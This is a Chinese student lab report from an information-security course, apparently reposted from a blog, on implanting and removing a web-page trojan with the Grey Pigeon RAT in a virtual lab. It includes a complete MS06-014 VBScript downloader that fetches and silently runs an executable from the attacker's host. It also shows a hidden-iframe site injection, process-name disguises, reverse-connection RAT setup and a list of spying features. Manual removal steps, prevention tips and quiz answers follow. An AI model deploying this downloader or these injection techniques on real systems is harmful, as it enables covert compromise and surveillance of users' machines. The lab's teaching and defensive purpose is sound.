《信息安全技术》实验四 木马及远程控制技术

实验目的

  • 剖析网页木马的工作原理
  • 理解木马的植入过程
  • 学会编写简单的网页木马脚本
  • 通过分析监控信息实现手动删除木马

实验内容

  1. 木马生成与植入
  2. 利用木马实现远程控制
  3. 木马的删除

实验人数

  • 每组2人,本组为20155314 20155304

实验环境

  • 系统环境

    • Windows Server 2003虚拟机
  • 网络环境
    • 交换网络结构

实验工具

  • 网络协议分析器
  • 灰鸽子
  • 监控器

实验类型

  • 设计性实验

实验原理

一、网页木马原理及相关定义

浏览器是用来解释和显示万维网文档的程序,已经成为用户上网时必不可少的工具之一。“网页木马”由其植入方式而得名,是通过浏览网页的方式植入到被控主机上,并对被控主机进行控制的木马。与其它网页不同,木马网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
       如果打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那么用户将会面临巨大的威胁。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。本练习中,我们利用微软的MS06014漏洞,完成网页木马的植入。


二、名词解释

  1. MS06014漏洞
       MS06014漏洞存在于Microsoft Data Access Components,利用微软的HTML Object标签的一个漏洞,Object标签主要是用来把ActiveX控件插入到HTML页面里。由于加载程序没有根据描述远程Object数据位置的参数检查加载文件的性质,因此Web页面里面的程序就会不经过用户的确认而自动执行。
  2. iframe标签
           iframe也叫浮动帧标签,它可以把一个HTML网页嵌入到另一个网页里实现“画中画”的效果。例如:       被嵌入的网页可以控制宽、高以及边框大小和是否出现滚动条等。如果把宽(width)、高(height)、边框(frameborder)都设置为0,代码插入到首页后,首页不会发生变化,但是嵌入的网页实际上已经打开。
  3. 反弹端口型木马
       分析防火墙的特性后可以发现,防火墙对于连入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。于是,与一般的木马相反,反弹端口型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口。木马定时监测控制端的存在,发现控制端上线后立即弹出端口主动连接控制端打开的被动端口。服务端通常会把打开的端口伪装成应用软件的端口,从而进一步降低被防火墙发现的概率。
  4. 网页木马生成脚本
       通常网页木马是通过“网马生成器”将木马安装程序的下载地址附加在网页上的,进而达到用户浏览含有木马的网页即自动下载安装程序的目的。下面给出一个“网马生成器”脚本,其中“//”后面的文字是对代码的注释。实验中需改动此脚本,自己动手生成网页木马。

三、木马的工作过程

木马的工作过程可分为四部分:木马的植入、木马的安装、木马的运行和木马的自启动。

  1. 木马的植入
       网页木马就是一个由黑客精心制作的含有木马的HTML网页,因为MS06014漏洞存在,当用户浏览这个网页时就被在后台自动安装了木马的安装程序。所以黑客会千方百计的诱惑或者欺骗人们去打开他所制作的网页,进而达到植入木马的目的。不过随着人们网络安全意识的提高,这种方法已经很难欺骗大家了。
           还有一种方法就是通过<iframe>标签,在一个正常网站的主页上链接网页木马。浏览者在浏览正常的网站主页时,iframe语句就会链接到含有木马的网页,网页木马就被悄悄植入了。这种方法就是大家经常说的“挂马”,而中了木马的主机通常被幽默的称作“肉鸡”。“挂马”因为需要获取网站管理员的权限,所以难度很大。不过他的危害也是十分巨大的,如果黑客获得了一个每天流量上万的知名网站的管理员权限并成功“挂马”,那试想他会有多少“肉鸡”。
  2. 木马的安装
       木马的安装在木马植入后就被立即执行。(本练习以灰鸽子木马程序为例)当网页木马植入后,木马会按照通过网页木马脚本中指向的路径下载木马服务端安装程序,并根据脚本中的设定对安装程序进行重命名。通常会重新命名一个与系统进程相近的名字(本实验中为winlogin.exe)来迷惑管理员,使安装过程及其留下的痕迹不通过细心查看不易被发觉。安装程序下载完成后,自动进行安装。生成可执行文件C:\Windows\hack.com.cn.ini,并修改注册表生成名为windows XP Vista的系统服务。其中hack.com.cn.ini就是木马服务器程序隐藏在背后的主谋。
  3. 木马的运行
       灰鸽子木马服务器安装完成后就会立刻连接网络寻找其客户端,并与其建立连接。这时木马程序会将自己的进程命名为IEXPLORE.EXE,此进程与Windows的IE浏览器进程同名,同样是为了迷惑管理员来伪装自己。当木马服务端与客户端建立连接后,客户端就如同拥有了管理员权限一样,可随意对“肉鸡”进行任何操作。
  4. 木马的自启动
       木马安装时生成系统服务Windows XP Vista。Windows XP Vista的可执行文件路径:C:\WINDOWS\Hacker.com.cn.ini。描述:“灰鸽子服务端程序,远程监控管理。”启动类型:“自动。”很明显可以看出灰鸽子是通过此系统服务执行hack.com.cn.ini文件来自启动木马服务器。存在于系统目录下的Hack.com.cn.ini文件被设置成一个隐藏的受保护的操作系统文件,很难被人发现。

四、灰鸽子木马的功能

  • 灰鸽子历程

    时间 事件
    2000年 第一个版本的灰鸽子诞生,并被各大安全厂商“关注”
    2002年 灰鸽子被安全厂商列入病毒库
    2003年 灰鸽子“牵手版”受到安全爱好者的追捧,使用人数超过冰河
    2003年 灰鸽子工作室开始进行商业运作,对用户实行会员制
    2004年 灰鸽子变种病毒泛滥,广大网友谈“灰”色变
    2005年 灰鸽子发展迅速,灰鸽子工作室网站访问量保持上升状态,论坛注册会员突破90000人
    2006年 灰鸽子的发展达到顶峰,占据了木马市场的半壁江山
    2007年 灰鸽子引起国内各大杀软厂商的声讨,对灰鸽子的“全民围剿”正式开始。灰鸽子工作室最终关闭

    比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、简易便捷的操作、良好的隐藏性使其他木马程序都相形见绌。灰鸽子客户端和服务端都是采用Delphi编写。利用客户端程序配置出服务端程序,可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。

  • 灰鸽子木马的基本功能
    1. 反向连接:由木马的“服务器程序”主动发起连接,这种连接方式也称为“反弹木马”,它的优点是可以突破NAT和防火墙。
    2. 文件管理:可以操作(查看、新建、删除等)被控主机的文件系统及上传下载文件。
    3. 注册表管理:可以操作(查看、新建、删除等)被控主机的注册表项。
    4. 系统信息查看:可以查看被监控主机的系统配置信息等。
    5. 剪贴板查看:可以查看被监控主机的剪贴板内容。
    6. 进程管理:可以查看被监控主机的进程表或杀死某个进程。
    7. 服务管理:可以启动、停止被监控主机的服务程序。
    8. 共享管理:可以新建、删除被监控主机的共享。
    9. Telnet:可以远程控制被监控主机的命令行。
    10. 配置代理服务器:可以利用被控制主机为跳板,对第三方进行攻击。
    11. 插件功能:可以捆绑第三方软件。
    12. 命令广播:控制端可以把控制命令一次性广播到若干台计算机。
    13. 捕获屏幕:可以查看被监控主机的屏幕图像。
    14. 视频语音:可以进行视频监控和语音监听。

五.木马的删除

木马的“客户端程序”可以控制木马的“服务器程序”的删除工作。另一种方法是通过手动删除,具体步骤将在“实验步骤”中详细说明。

实验步骤

本练习主机A、B为一组,C、D为一组,E、F为一组。实验角色说明如下:

实验主机 实验角色
主机A、C、E 木马控制端(木马客户端)
主机B、D、F 木马被控端(木马服务器)

下面以主机A、B为例,说明实验步骤。

首先在Windows Server 2003虚拟机中使用ipconfig命令查看虚拟机IP地址为172.16.0.135,再在本机上用ping命令尝试与虚拟机连接:

如图,表明连接成功。

一、木马生成与植入

用户主机通过访问被“挂马”的网站而被植入木马的过程:

  1. 用户访问被“挂马”的网站主页。(此网站是安全的)
  2. “挂马”网站主页中的<iframe>代码链接一个网址(即一个网页木马),使用户主机自动访问网页木马。(通过把<iframe>设置成不可见的,使用户无法察觉到这个过程)
  3. 网页木马在得到用户连接后,自动发送安装程序给用户。
  4. 如果用户主机存在MS06014漏洞,则自动下载木马安装程序并在后台运行。
  5. 木马安装成功后,木马服务端定时监测控制端是否存在,发现控制端上线后立即弹出端口主动连接控制端打开的被动端口。
  6. 客户端收到连接请求,建立连接。

(一)生成网页木马

  1. 主机A首先通过Internet信息服务(IIS)管理器启动“木马网站”。(为什么启动木马网站?)
  2. 主机A进入实验平台在工具栏中单击“灰鸽子”按钮运行灰鸽子远程监控木马程序。第一次打开时发现程序下方提示"打开自动上线端口失败!你不能使用自动上线功能!",重新启动程序即可解决该问题,如下图:此时程序下方提示"连接成功!"等字样,表明已成功上线。
  3. 主机A生成木马的“服务器程序”。
           主机A单击木马操作界面工具栏“配置服务程序”按钮,弹出“服务器配置”对话框,单击“自动上线设置”属性页,在“IP通知http访问地址、DNS解析域名或固定IP”文本框中输入本机IP地址,在“保存路径”文本框中输入D:\Work\IIS\Server_Setup.exe,单击“生成服务器”按钮,生成木马“服务器程序”。(除了“自动上线设置”属性页,还有“安装选项”、“启动项设置”、“代理服务”、“高级选项”、“插件功能”属性页)(为什么在“保存路径”文本框中输入D:\Work\IIS\Server_Setup.exe?换为另一个路径可以吗?)
  4. 主机A编写生成网页木马的脚本。
           在桌面建立一个Trojan.txt文档,打开Trojan.txt,将实验原理中网马脚本写入,并将脚本第15行“主机IP地址”替换成主机A的IP地址172.16.0.135。把Trojan.txt文件扩展名改为.htm,生成Trojan.htm网页木马源码如下:

     <html><script language="VBScript"><!-- 首先动态创建对象组件,并声明组件的clsid -->Set df = document.createElement("object")df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"<!-- 创建XMLHTTP对象,用来完成从数据包到Request对象的转换以及发送任务 -->Set xh = df.createObject("Microsoft.XMLHTTP","")<!-- 创建Adodb.Stream对象,提供存取二进制数据或文本流,实现对流的读、写等操作 -->Set ados = df.createObject("Adodb.Stream","")ados.type = 1<!-- 使用HTTP GET初始化HTTP请求 -->url = "http://172.16.0.135:9090/Server_Setup.exe"xh.Open "GET", url, False<!-- 发送HTTP请求,并获取HTTP响应 -->xh.Send<!-- 创建Scripting.FileSystem对象,提供对计算机文件系统进行访问 -->Set fs = df.createObject("Scripting.FileSystemObject","")<!-- 获取目标路径,0为windows目录;1为system目录;2为用户临时目录 -->Set tmpdir = fs.GetSpecialFolder(2)<!-- 向目标路径后添加文件名称winlogin.exe,此名称与系统文件名相似,不易被察觉 -->fname1="winlogin.exe"fname1= fs.BuildPath(tmpdir,fname1)<!-- 打开Adodb.Stream对象,将服务器返回的响应数据写入对象,将对象内容保存至目标文件-->ados.Openados.Write xh.responseBodyados.SaveToFile fname1,2<!-- 文件系统操作完成,关闭对象 -->ados.Close<!-- 创建Shell对象,调用执行目标文件 -->Set sl = df.createObject("Shell.Application","")<!-- 以隐藏方式运行木马 -->sl.ShellExecute fname1,"","","open",0</script></html>

    「注」C:\ExpNIS\NetAD-Lab\Projects\Trojan\Trojan.htm文件提供了VB脚本源码。
    将生成的Trojan.htm文件保存到D:\Work\IIS\目录下(D:\Work\IIS\为“木马网站”的网站空间目录),Trojan.htm文件就是网页木马程序。(为什么要将Trojan.htm文件保存到D:\Work\IIS\目录下?)

(二)完成对默认网站的“挂马”过程

  1. 主机A进入目录C:\Inetpub\wwwroot,使用记事本打开index.html文件。
           「注」“默认网站”的网站空间目录为C:\Inetpub\wwwroot\,主页为index.html
  2. index.html进行编辑。在代码的底部加上<iframe>语句,具体见实验原理-->名词解释-->iframe标签(需将http://www.jlcss.com/index.html修改为http://本机IP:9090/Trojan.htm),实现从此网页对网页木马的链接。(iframe标签有什么作用?iframe也叫浮动帧标签,它可以把一个HTML网页嵌入到另一个网页里实现“画中画”的效果。被嵌入的网页可以控制宽、高以及边框大小和是否出现滚动条等。如果把宽、高、边框都设置为0,代码插入到首页后,首页不会发生变化,但是嵌入的网页实际上已经打开)(为什么使用9090端口?)
  3. 木马的植入
    1. 主机B设置监控。
             主机B进入实验平台,单击工具栏“监控器”按钮,打开监控器。
      在向导栏中依次启动“进程监控”、“端口监控”,选择“文件监控”,在菜单栏中选择“选项”-->“设置”,在设置界面中设置监视目录C:\Windows\(默认已被添加完成),操作类型全部选中,启动文件监控。


      启动协议分析器,单击菜单“设置”-->“定义过滤器”,在弹出的“定义过滤器”对话框中选择“网络地址”选项卡,设置捕获主机A与主机B之间的数据。
      新建捕获窗口,点击“选择过滤器”按钮,确定过滤信息。在捕获窗口工具栏中点击“开始捕获数据包”按钮,开始捕获数据包。

      主机B启动IE浏览器,访问http://主机A的IP地址
    2. 主机A等待“灰鸽子远程控制”程序主界面的“文件管理器”属性页中“文件目录浏览”树中出现“自动上线主机”时通知主机B。
    3. 主机B查看“进程监控”、“服务监控”、“文件监控”和“端口监控”所捕获到的信息。(观察木马服务器端安装程序的运行结果与配置服务器时的设置是否一致。)
      在“进程监控”-->“变化视图”中查看是否存在“进程映像名称”为Hacker.com.cn.ini的新增条目。观察进程监控信息,结合实验原理回答下面的问题。(Hacker.com.cn.ini在前面的过程中哪里设置的?)
             Hacker.com.cn.ini文件是由哪个进程创建的:Winlogin.exe
      在“服务监控”中单击工具栏中的“刷新”按钮,查看是否存在“服务名称”为“Windows XP Vista” 的新增条目,观察服务监控信息,回答下面的问题。(Windows XP Vista服务在前面的过程中哪里设置的?)
             Windows XP vista服务的执行体文件是:C:\Windows\hack.com.cn.ini
      在“文件监控”中查看“文件名”为C:\WINDOWS\Hacker.com.cn.ini的新增条目。
      在“端口监控”中查看“远程端口”为“8000”的新增条目,观察端口监控信息,回答下面问题:(端口8000在前面的过程中哪里设置的?主机A灰鸽子远程控制软件的服务器配置时设置的
      8000服务远程地址(控制端)地址:172.16.0.135
      经过对上述监控信息的观察,你认为在“进程监控”中出现的winlogoin.exe进程(若存在)在整个的木马植入过程中起到的作用是:用于定时监测控制端是否存在,发现控制端上线后立即弹出端口主动连接控制端打开的被动端口;(winlogoin.exe在前面的过程中哪里设置的?在修改网页挂马脚本文件Trojan.htm时设置的
    4. 主机B查看协议分析器所捕获的信息:

二、木马的功能

(一)文件管理

  1. 主机B在目录D:\Work\Trojan\下建立一个文本文件,并命名为Test.txt
  2. 主机A操作“灰鸽子远程控制”程序来对主机B进行文件管理。
    单击“文件管理器”属性页,效仿资源管理器的方法在左侧的树形列表的“自动上线主机”下找到主机B新建的文件D:\Work\Trojan\Test.txt。在右侧的详细列表中对该文件进行重命名操作。
  3. 在主机B上观察文件操作的结果。

(二)系统信息查看

主机A操作“灰鸽子远程控制”程序查看主机B的操作系统信息。单击“远程控制命令”属性页,选中“系统操作”属性页,单击界面右侧的“系统信息”按钮,查看主机B操作系统信息。

(三)进程查看

  1. 主机A操作“灰鸽子远程控制”程序对主机B启动的进程进行查看
    单击“远程控制命令”属性页,选中“进程管理”属性页,单击界面右侧的“查看进程”按钮,查看主机B进程信息。
  2. 主机B查看“进程监控”-->“进程视图”枚举出的当前系统运行的进程,并和主机A的查看结果相比较。

(四)注册表管理

主机A单击“注册表编辑器”属性页,在左侧树状控件中“远程主机”(主机B)注册表的HKEY_LOCAL_MACHINE\Software\ 键下,创建新的注册表项;对新创建的注册表项进行重命名等修改操作;删除新创建的注册表项,主机B查看相应注册表项。

(五)Telnet

主机A操作“灰鸽子远程控制”程序对主机B进行远程控制操作,单击菜单项中的“Telnet”按钮,打开Telnet窗口,使用cd c:\命令进行目录切换,使用dir命令显示当前目录内容,使用其它命令进行远程控制。

(六)其它命令及控制

主机A通过使用“灰鸽子远程控制”程序的其它功能(例如“捕获屏幕”),对主机B进行控制。

三、木马的删除

(一)自动删除

主机A通过使用“灰鸽子远程控制”程序卸载木马的“服务器”程序。具体做法:选择上线主机,单击“远程控制命令”属性页,选中“系统操作”属性页,单击界面右侧的“卸载服务端”按钮,卸载木马的“服务器”程序。

(二)手动删除

  1. 主机B启动IE浏览器,单击菜单栏“工具”-->“Internet 选项”,弹出“Internet 选项”配置对话框,单击“删除文件”按钮,在弹出的“删除文件”对话框中,选中“删除所有脱机内容”复选框,单击“确定”按钮直到完成。
  2. 双击“我的电脑”,在浏览器中单击“工具”-->“文件夹选项”菜单项,单击“查看”属性页,选中“显示所有文件和文件夹”,并将“隐藏受保护的操作系统文件”复选框置为不选中状态,单击“确定”按钮。
  3. 关闭已打开的Web页,启动“Windows 任务管理器”。单击“进程”属性页,在“映像名称”中选中所有“IEXPLORE.EXE”进程,单击“结束进程”按钮。
  4. 删除C:\Widnows\Hacker.com.cn.ini文件。
  5. 启动“服务”管理器。选中右侧详细列表中的“Windows XP Vista”条目,单击右键,在弹出菜单中选中“属性”菜单项,在弹出的对话框中,将“启动类型”改为“禁用”,单击“确定”按钮。
  6. 启动注册表编辑器,删除HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windows XP Vista节点。
  7. 重新启动计算机。
  8. 主机A如果还没卸载灰鸽子程序,可打开查看自动上线主机,已经不存在了。

课后测试

  1. 在网页木马实验中,使用的挂马方式是()?

    A. 利用iframe

    【答案】A

  2. 在网页木马实验中,木马服务器端的自动下载和执行安装利用的是()的漏洞。

    A. IIS

    B. IE

    C. HTTP

    D. RPC

    【答案】B

  3. 本次实验中,木马的自启动方式是()。

    A. 利用修改文件关联

    B. 利用修改WIN.ini配置文件

    C. 利用修改注册表中以Run开头的键值

    D. 利用增加系统服务

    【答案】D

  4. 关于在实验中所生成的Server_Setup.exe,描述正确的是()。

    A. Server_Setup.exe是木马服务端程序

    B. Server_Setup.exe是木马服务端安装程序

    C. Server_Setup.exe是客户端程序

    D. Server_Setup.exe是客户端安装程序

    【答案】B

  5. 在木马实验中,关于目录"C:\Inetpub\wwwroot"、"D:\Work\IIS",网页文件index.html、Trojan.htm和默认网站、木马网站的关系描述正确的是()?

    A. index.html是默认网站的首页,放在D:\Work\IIS\目录下

    B. index.html是木马网站的首页,放在C:\Inetpub\wwwroot\目录下

    C. Trojan.htm是木马网站的页面,放在D:\Work\IIS\目录下

    D. Trojan.htm是默认网站的页面,放在C:\Inetpub\wwwroot\目录下

    【答案】C

  6. 木马程序包含服务端和客户端,通常都是服务端监听到客户端的连接请求时进行响应,然后建立服务端与客户端的连接。本次实验中木马建立连接是()端先发起连接请求?这种木马被称为()木马?

    A. 客户端,反弹端口型

    B. 服务端,反弹端口型

    C. 客户端,复用端口型

    D. 服务端,复用端口型

    【答案】B

  7. 在实验中,在“进程监控”中看到的新建的"Hacker.com.cn.ini"是由哪个进程创建的?

    A. Explorer

    B. IE

    C. Winlogin

    D. rundll32

    【错选】D

    【答案】C

  8. 假设实验中,攻击者IP为172.16.0.83,被攻击者IP为172.16.0.12,在实验过程中捕获了带有如下内容的一些数据包:(1)Windows Server 2000 5.2(3790 Service Pack1);(2)GET/Trojan.htm;(3)Referer:http//172.16.0.83/;(4)GET/server_setup.exe;下列按捕获的先后顺序排列序号正确的是()?

    A. (1)(2)(3)(4)

    B. (3)(1)(2)(4)

    C. (3)(2)(4)(1)

    D. (1)(3)(4)(2)

    【答案】C

  9. 下图是网页木马脚本的一部分,根据脚本回答如下问题:当访问这个网页时,会发送什么GET请求?

    A. get/server_setup.exe

    B. get/Trojan.htm

    C. get/winlogin.exe

    D. get/Hacker.com.cn.ini

    【错选】C

    【答案】A

  10. 下图是网页木马脚本的一部分,根据脚本回答如下问题:下载的文件会以什么为文件名?

    A. Server_Setup.exe

    B. winlogin.exe

    C. trojan.exe

    D. fname

    【答案】B

  11. 下图是网页木马脚本的一部分,根据脚本回答如下问题:保存到哪个目录下?

    A. windows目录

    B. system目录

    C. 用户临时目录

    D. Config目录

    【答案】C

  12. 下列哪些功能是木马服务端不能够实现的()?

    A. 文件访问

    B. 自动关机

    C. 寻找漏洞

    D. 添加用户

    【我的回答】C

思考题

  1. 列举出几种不同的木马植入方法。

    • 利用E-MAIL
    • 软件下载
    • 利用共享和Autorun文件
    • 把木马文件转换为图片格式
    • 伪装成应用程序扩展组件
    • 利用WinRar制作成自释放文件
    • 在Word文档中加入木马文件
    • 把木马和其他文件捆绑在一起
  2. 列举出几种不同的木马防范方法。
    • 为计算机安装杀毒软件,定期扫描系统、查杀病毒;及时更新病毒库、更新系统补丁
    • 下载软件时尽量到官方网站或大型软件下载网站,在安装或打开来历不明的软件或文件前先杀毒
    • 不随意打开不明网页链接,尤其是不良网站的链接,陌生人通过QQ给自己传链接时,尽量不要打开
    • 使用网络通信工具时不随便接收陌生人的文件,若接收,可在工具菜单栏中“文件夹选项”中取消“隐藏已知文件类型扩展名”的功能来查看文件类型
    • 对公共磁盘空间加强权限管理,定期查杀病毒
    • 打开移动存储器前先用杀毒软件进行检查,可在移动存储器中建立名为“autorun.inf”的文件夹(可防U盘病毒启动)
    • 需要从互联网等公共网络上下载资料转入内网计算机时,用刻录光盘的方式实现转存
    • 对计算机系统的各个账号要设置口令,及时删除或禁用过期账号
    • 定期备份,以便遭到病毒严重破坏后能迅速修复

参考资料

  • L0phtCrack
  • Windows下LM-Hash与NTLM-Hash生成原理
  • 使用 Markdown 时,如何为文字加下划线?

转载于:https://www.cnblogs.com/crazymosquito/p/7904266.html

《信息安全技术》实验四 木马及远程控制技术相关推荐

  1. 20155231 20155234 信息安全技术 实验四 木马及远程控制技术 实验报告

    20155231 20155234 信息安全技术 实验四 木马及远程控制技术 实验报告 姓名: 邵煜楠 学号: 20155231 日期: 2017.11.21 姓名: 昝昕明 学号: 20155234 ...

  2. 20155209 20155230 《信息安全技术》实验四 木马及远程控制技术

    索引: 实验目的 实验内容 实验步骤 思考题 实验体会 一. 实验目的 1. 剖析网页木马的工作原理 2. 理解木马的植入过程 3. 学会编写简单的网页木马脚本 4. 通过分析监控信息实现手动删除木马 ...

  3. 信息安全技术—实验四:Ip包监视程序实现

    一.实验目的及要求 学生在熟悉网络数据通信原理以及TCP/IP协议结构原理的基础上,运用套接字编程实现的网络封包监视技术,有效地探测在网络上传输的数据包信息,通过对这些信息的分析利用是有助于网络安全维 ...

  4. 实验四:Telnet远程登录服务器的安装、管理及Telnet客户端的应用

    实验四:Telnet远程登录服务器的安装.管理 及Telnet客户端的应用 一.       实验目的 1.掌握Telnet远程登录服务器的安装.使用和配置: 2.熟悉Telnet客户端使用方法. 二 ...

  5. 信息安全技术实验:利用 burp suite破解 web 后台

    信息安全技术实验:利用 burp suite破解 web 后台 一.实验目的 二.实验内容与设计思想 三.实验使用环境 四.实验步骤和调试过程 五.实验小结 一.实验目的 1. 理解网站暴力破解的原理 ...

  6. 信息安全技术实验PGP邮件加密系统工具下载过程记录

    由于信息安全技术实验课程需要,上网查找资料学习,仅记录安装过程. 一.安装 (1)从网上下载好资源,双击setup目录下的64位安装包,并选择默认语言English (2)选择安装协议I accept ...

  7. 【信息安全技术】实验报告:木马及远程控制技术

    实验目的 剖析网页木马的工作原理 理解木马的植入过程 学会编写简单的网页木马脚本 通过分析监控信息实现手动删除木马 实验内容 木马生成与植入 利用木马实现远程控制 木马的删除 实验过程 主机A 通过I ...

  8. java文件加密解密实验报告_《网络信息安全技术》_实验报告_破译vigenamp#232;re_密码加密的密文...

    <<网络信息安全技术>_实验报告_破译vigen&amp#232;re_密码加密的密文>由会员分享,可在线阅读,更多相关<<网络信息安全技术>_实验报 ...

  9. 实验四 基于PPTP的远程VPN实现【网络安全】

    实验四 基于PPTP的远程VPN实现[网络安全] 前言 推荐 实验四 基于PPTP的远程VPN实现 使用: 配置CentOS PPTP服务端 配置CentOS PPTP客户端 常见问题 浏览器无法打开 ...

  10. matlab信息隐藏算法,实验四--基于DCT域的信息隐藏算法

    <实验四--基于DCT域的信息隐藏算法>由会员分享,可在线阅读,更多相关<实验四--基于DCT域的信息隐藏算法(6页珍藏版)>请在人人文库网上搜索. 1.实验四 基于DCT域的 ...

最新文章

  1. linux oracle io 查看,Linux上Oracle是否使用异步io的诊断
  2. vscode折叠/展开所有区域代码快捷键
  3. 解决:”ssh-keygen 不是内部或外部命令“ 的问题
  4. vb6中使text控件的光标随着增加的内容向下移动
  5. 黑客——技术的凝聚者???
  6. oracel 创建视图给某个用户
  7. java调用日期控件_JAVA基础应用:日期时间选择控件(代码)
  8. 自由之战服务器显示登录失败,自由之战:生存的游戏一直登入不进去怎么办
  9. 计算机软件行业职业病,IT行业的六大职业病,看看你有没有中
  10. 手把手教你MacOS如何安装SVN
  11. SPSS数据分析之分类变量频率分析
  12. C语言printf输出格式说明
  13. MTF、Resolution、Contrast解读
  14. Android面试之计算机网络基础
  15. java中画图喷枪_JAVA 画图板实现(基本画图功能+界面UI)一、界面实现
  16. Java短信确认机制_JAVA 消息确认机制之 ACK 模式
  17. pandas学习笔记1—categories与set_categories
  18. hdfs文件系统和linux文件系统,分布式文件系统HADOOP HDFS与传统文件系统LINUX FS的比较与分析...
  19. 为什么结婚戒指要带在无名指上?
  20. java代码命名规范

热门文章

  1. AXI总线 详细整理
  2. python的pandas库无法调用_pandas库中最重要的几个知识点
  3. PS/PR/AE全套插件一键安装包无需注册码
  4. 批量 材质 调整_3dmax怎么批量修改材质
  5. 怎么把ipad中超大文件传输到电脑
  6. 个人商业画布分析-0408-v1.0王玉娟
  7. 作为第三代互联网,Web3 的理念还未被真正阐述
  8. visio连接线设置
  9. VRay Next(4.0) for SketchUp之BIG分析图制作教程
  10. 手把手教你如何获得光学成像系统的PSF(点扩散函数)——从beads成像到处理图像的经验分享